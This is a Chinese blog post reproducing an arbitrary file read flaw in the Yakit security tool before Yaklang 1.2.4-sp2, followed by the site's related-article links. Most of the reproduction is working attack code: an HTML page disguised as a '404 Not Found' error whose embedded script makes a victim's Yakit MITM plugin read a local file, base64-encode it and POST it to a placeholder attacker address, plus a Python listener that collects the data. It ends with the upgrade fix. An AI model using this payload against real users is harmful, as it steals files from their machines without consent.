【漏洞复现】Yakit任意文件读取漏洞

最新推荐文章于 2024-05-17 11:39:40 发布
最新推荐文章于 2024-05-17 11:39:40 发布
阅读量391 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54981229/article/details/132381788
版权

漏洞描述

Yakit是基于yak语言开发的网络安全单兵工具,旨在打造一个覆盖渗透测试全流程的网络安全工具库,是近年新兴的一个BurpSuite平替工具,和burp的区别就在于数据包放过去不用配置ip端口协议这些,近期yakit爆出了一个任意文件读取漏洞,此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件。

Yakit默认不会对经过MITM代理的流量中的fuzztag进行解析,但是经过插件时会被解析。这是漏洞原理也是漏洞利用的限制。

影响版本

< Yaklang 1.2.4-sp2

漏洞复现

开启yakit的MITM代理并选择任意插件(ps:测试时好像有的插件行有的不行)

创建html,并开启web服务。python开端口,或者phpstudy都行,这里看自己习惯。

<!DOCTYPE html>
<html>
<head>
    <title>404 Not Found</title>
</head>
<body>
    <h1>404 Not Found</h1>
    <p>Nginx</p>
    <script>
        const xhr = new XMLHttpRequest();
        xhr.open("POST", "http://your-ip:23800");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send(`file={{base64enc(file(C:\\Windows\\System32\\drivers\\etc\\hosts))}}`);
      </script>
</body>
</html>

开启监听

yakit.py

# -*- coding: utf-8 -*-
#! /bin/python3
import socket

# 监听地址和端口
host = '0.0.0.0'
port = 23800

# 创建socket服务器
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# 绑定并监听端口
server.bind((host, port))
server.listen()

# 接收连接并监听请求
print("Listening...")
while True:
    # 接收客户端连接请求
    client, address = server.accept()
    print(f"Connected by {address}")

    # 读取客户端请求数据
    request = ''
    while True:
        input_data = client.recv(1024).decode('utf-8')
        request += input_data
        if len(input_data) < 1024:
            break

    # 提取请求头部
    headers = request.split('\n')
    print("Received headers:")
    for header in headers:
        print(header)

    # 关闭客户端连接
    client.close()

报这个错的话第一行加上# -*- coding: utf-8 -*-

使用方法:python yakit.py

然后访问上面创建的1.html

base64解码:

修复方法

1.2.4-sp2版本已进行修复,更新至1.2.4-sp2及以上版本

Morysummer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Day101:漏洞-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
qq_61553520的博客
04-14 1076
小迪安全-Day101:漏洞-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
集成化单兵安全能力平台-Yakit
siu~
12-13 2689
`Yakit` 简单来讲就是一个安全平台,平台里支持很多功能模块(`渗透测试、资产搜集、漏洞检测、反连管理`等) 是一款非常优秀强悍的安全测试工具
记一次“安全扫描工具联动”自动化扫描漏洞流程
最新发布
黑战士的博客
05-17 1037
Acunetix Web Vulnerability Scanner(AWVS)是用于测试和管理Web应用程序安全性的平台,能够自动扫描互联网或者本地局域网中是否存在漏洞,并报告漏洞。可以扫描任何通过Web浏览器访问和遵循HTTP/HTTPS规则的Web站点。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞漏洞来审核Web应用程序的安全性。
网络安全单兵工具 -- YAKIT
qq_50854662的博客
11-14 1408
网络安全单兵工具 -- YAKIT
单兵渗透工具-Yakit-Windows安装使用
热门推荐
weixin_44257023的博客
08-19 2万+
单兵渗透工具-Yakit-Windows安装使用
网络安全单兵工具 -- Yakit的简介和安装
m0_60045654的博客
11-27 2312
基于安全融合的理念,Yaklang.io 团队研发出了安全领域垂直语言Yaklang,对于一些无法原生集成在Yak平台中的产品/工具,利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品,Yaklang能直接编译融合,并对源码进行必要修改,更好地适配Yaklang语言。但是限于使用形式,用户想要熟练使用Yak 语言,需要学习Yak语言并同时具备对安全的一定理解。
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
yakit-master
01-19
yakit-master
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
国产之光Yakit——POC模拟神器
liwenxiang629的博客
01-09 1万+
Yakit 是一个高度集成化的 Yak 语言安全能力的安全测试平台,使用 Yakit,可以做到: 1. 类 Burpsuite 的 MITM 劫持操作台 2. 查看所有劫持到的请求的历史记录以及分析请求的参数 3. 全球第一个可视化的 Web 模糊测试工具:Web Fuzzer 4. Yak Cloud IDE:内置智能提示的 Yak 语言云 IDE 5. ShellReceiver:开启 TCP 服务器接收反弹交互式 Shell 的反连 6. 第三方 Yak 模块商店:社区主导的第三方 Yak 模块插件,
Yakit 近期漏洞盘【8月】
YakProject的博客
11-01 99
Yso-Java Hack功能和网络检测功能导致的问题都是self exploit,不会造成真正安全风险,但对于这种未预期的行为可能作为潜在的安全隐患,所以也及时做了修。对于任意文件读取漏洞,从发布到修不到一小时(by 劳模V神),师傅们及时更新就好了。注意:师傅们在公网部署引擎时不要偷懒使用空密码,别人连上就能RCE。师傅们也不要随便连未知的引擎,小心被反制(例如在前端调用chrome时从引擎获取到恶意的chrome路径)。
常用漏洞扫描工具:七大工具
NSQ0207的博客
07-17 737
(1) 下载: bash
Yakit基本使用
wwwwwhdn的博客
11-03 3283
基于安全融合的理念,Yaklang.io 团队研发出了安全领域垂直语言Yaklang,对于一些无法原生集成在Yak平台中的产品/工具,利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品,Yaklang能直接编译融合,并对源码进行必要修改,更好地适配Yaklang语言。但是限于使用形式,用户想要熟练使用Yak 语言,需要学习Yak语言并同时具备对安全的一定理解。
Yakit工具篇:WebFuzzer模块之序列操作
黄乔国PHP
11-08 1533
Web Fuzzer 序列就是将多个 Web Fuzzer 节点串联起来,实杂的逻辑与功能。例如我们需要先进行登录,然后再进行其他操作,这时候我们就可以使用 Web Fuzzer 序列功能。或者是我们在一次渗透测试中需要好几个步骤才能验证是否有漏洞这种场景。像这种如果使用burp来操作这种需要好几个步骤这种场景,往往很难实。在Yakit里面实起来相对来说就比较容易了。接下来我们一起来看看在文件上传的时候,我们怎么利用序列来完成上传并验证的。
shopxo download 任意文件读取漏洞
09-02
然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值